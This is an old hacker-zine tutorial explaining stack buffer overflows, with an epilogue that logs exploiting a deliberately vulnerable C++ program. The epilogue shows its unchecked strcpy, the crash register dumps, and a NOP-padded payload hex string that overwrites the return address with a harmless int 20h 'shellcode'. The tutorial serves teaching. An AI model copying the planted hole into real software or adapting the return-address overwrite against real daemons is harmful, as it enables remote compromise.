Principles of Buffer Overflow explained

.-= {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-}=-.
                Principles of Buffer Overflow explained by Jus
.-= {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-}=-.

This article is an attempt to quickly and simply explain everyone's favourite
manner of exploiting daemons - The Buffer Overflow.

- Huh? -

The remote buffer overflow is a very commonly found and exploited bug in badly
coded daemons - by overflowing a buffer on the stack one can make the software
execute a shell under the daemon's own UID - thus if the daemon runs as root,
as many do, a root shell will be spawned, giving full remote access.

A buffer is a block of computer memory that holds many instances of the same
data type - an array. Arrays can be static or dynamic: static arrays are
allocated at load time, dynamic ones at run time on the stack. We will be
looking at dynamic, stack-based buffers, and at overflowing them - writing
past the end of the buffer and breaking its boundaries.

A stack is a pile of objects placed one on top of the other, where the last
object placed on the stack will be the first one to be removed. This is called
LIFO - or last in first out. An element can be added to the stack (PUSH) and
removed (POP). The call stack is made up of stack frames, which are pushed
when calling a function in code and popped when returning from it.

The stack pointer (SP) always points to the top of the stack; the bottom of it
is at a fixed address. PUSH and POP operations change the size of the stack
dynamically at run time, and depending on the architecture it grows either
down the memory addresses (as on x86) or up them. One could address variables
in the stack by giving their offsets from SP, but as POPs and PUSHes occur
these offsets change. A second pointer, the frame pointer (FP), points to a
fixed location within a frame. It can be used for referencing variables
because their distances from the FP do not change.

- The Overflow -

A buffer overflow is what happens when more data is forced into a buffer than
it can hold, so the excess spills into whatever sits next to it on the stack.
We use this to change the flow of execution of a program - hopefully by
executing code of our choice, normally just to spawn a shell.

We can change the return address of a function by overfilling a buffer in its
stack frame: the excess data runs past the end of the buffer and overwrites
what is stored beyond it, including the saved return address - this then
means that we can change the flow of the program. By filling the buffer up
with shellcode, designed to spawn a shell on the remote machine, and
overwriting the return address so that it points back into the buffer, we can
make the program run the shellcode.

This is just a simplified version of what actually happens during a buffer
overflow - there is more to it, but the basics are essential to understand if
you want to win an argument one day.

-jus (jus@security.za.net)

[ Epilogue by Wyzewun:

Time for a practical example. I did this some time ago on my Dad's Windoze box
to explain it to myself: I had downloaded a file on Win32 buffer overflows but
I really didn't feel like reading, so I figured it out myself instead. It took
me +-20 mins to do the whole thing, but at least I was keeping a log of me
trying to get it right so I can just paste it more or less unchanged here -
save, of course, for the explanations. Next time I'll get human and actually
READ UP on whatever I'm trying to do before I try to DO it so I don't waste so
much damn time. :/ Anyway, here are the notes...

#include <iostream>
#include <cstring>

using namespace std;

int main() {

  char buffer[40];
  char buffer2[20]; // This doesn't need to be smaller though

  cout << "Gimmee a variable\n";
  cin >> buffer;            // reads one whitespace-delimited word
  strcpy(buffer2, buffer);  // deliberately unchecked: can overflow buffer2
  return 666; }

Because strcpy() has no bounds checking, and buffer2 only has room for 19
characters plus the terminating NUL, there is an obvious buffer overflow
vulnerability here...

c:\>overflow
Gimmee a variable
12345678901234567890

It executed fine. Now let's try...

c:\>overflow
Gimmee a variable
123456789012345678901

At this point Windoze cuts in with the following...

OVERFLOW caused an invalid page fault in module OVERFLOW.EXE at 015f:00402127.

Registers:
EAX=0000029a CS=015f EIP=00402127 EFLGS=00000206
EBX=00530000 SS=0167 ESP=0063fe0c EBP=00630031
ECX=0063fdd4 DS=0167 ESI=81596754 FS=1157
EDX=00400031 ES=0167 EDI=00000000 GS=0000

Bytes at CS:EIP:
89 45 e4 50 e8 12 15 00 00 8b 45 ec 8b 08 8b 09 

Stack dump:
00000000 81596754 00530000 c0000005 0063ff68 0063fe0c 0063fc3c 0063ff68
00403d18 00407190 00000000 0063ff78 bff8b537 00000000 81596754 00530000 

Is this a buffer overflow bug or is this something else we are mistaking for
one? Well, let's check, we feed it a good 30 "a" characters and we look at the
values of the registers when it dies....

Registers:
EAX=0000029a CS=015f EIP=61616161 EFLGS=00000202
EBX=00530000 SS=0167 ESP=0063fe00 EBP=61616161
ECX=0063fddc DS=0167 ESI=81596628 FS=117f
EDX=00006161 ES=0167 EDI=00000000 GS=0000

Aaah, see that? EIP is 61616161 - 61 being the hex value of the "a" character,
so it's overflowing all right. Now let's exploit it. :) First off, we add the
following line into the example C++ proggy above...

cout << &buffer2 << "\n";

And when executing the program, the output we get is as follows...

0x0063FDE4
Gimmee a variable

Right, so buffer2's address is 0x0063FDE4 - and just in case that's a bit off
for some reason - we'll pad it a bit.

Padding? Right. Executing the NOP instruction (0x90 on x86), which most CPUs
have in some form - just something to do nothing. That way, hopefully, when we
overwrite the return address we can land somewhere in the middle of the NOPs,
and then just execute along until we get to our shellcode. Errr, I'm not being
clear, what I mean is the buffer will look like:
[NOPNOPNOPNOP] [SHELLCODE] [NOPNOPNOPNOP] [RET]

Shellcode? Right. We can execute pretty much anything we want, and as much as
I would like to have interesting shellcode, I don't have the tools to make
some on this PC, and I *really* don't feel like going online to rip somebody
else's. And so, my choice in shellcode - int 20h - program termination. :)

Right!!! So our shellcode is 2 bytes, and we can feed the program 24
characters before we start overwriting the return address (20 for buffer2 plus
4 for the saved EBP, going by the register dumps above), so let's have 11 NOP
characters on either side of our shellcode just to make it pretty and even
looking. Let's try this out...

c:\>overflow
Gimmee a variable
Í cıä

c:\>

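Heeey, I gave it too many characters and it didn't crash. It worked. :) That
string in hex would be 9090909090909090909090CD20909090909090909090909063FDE4,
the CD20 in the middle being interrupt 20h, and the 63FDE4 being the address
of the buffer we're overflowing, which we are setting as the return address,
namely 0x0063FDE4. (Two things to watch if you try this yourself: x86 is
little-endian, so for the CPU to read 0x0063FDE4 those bytes have to sit in
memory lowest-first, E4 FD 63, with the NUL that strcpy() appends supplying
the top 00 byte; and cin >> stops reading at whitespace, which includes the
0x20 byte of CD20, so a clean exit on its own doesn't prove the return address
was overwritten.) Hopefully you're beginning to see the idea here. If you
would like to play around with my example file some more, I included the
binary in the general-junk directory of this issue. Have fun! ]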
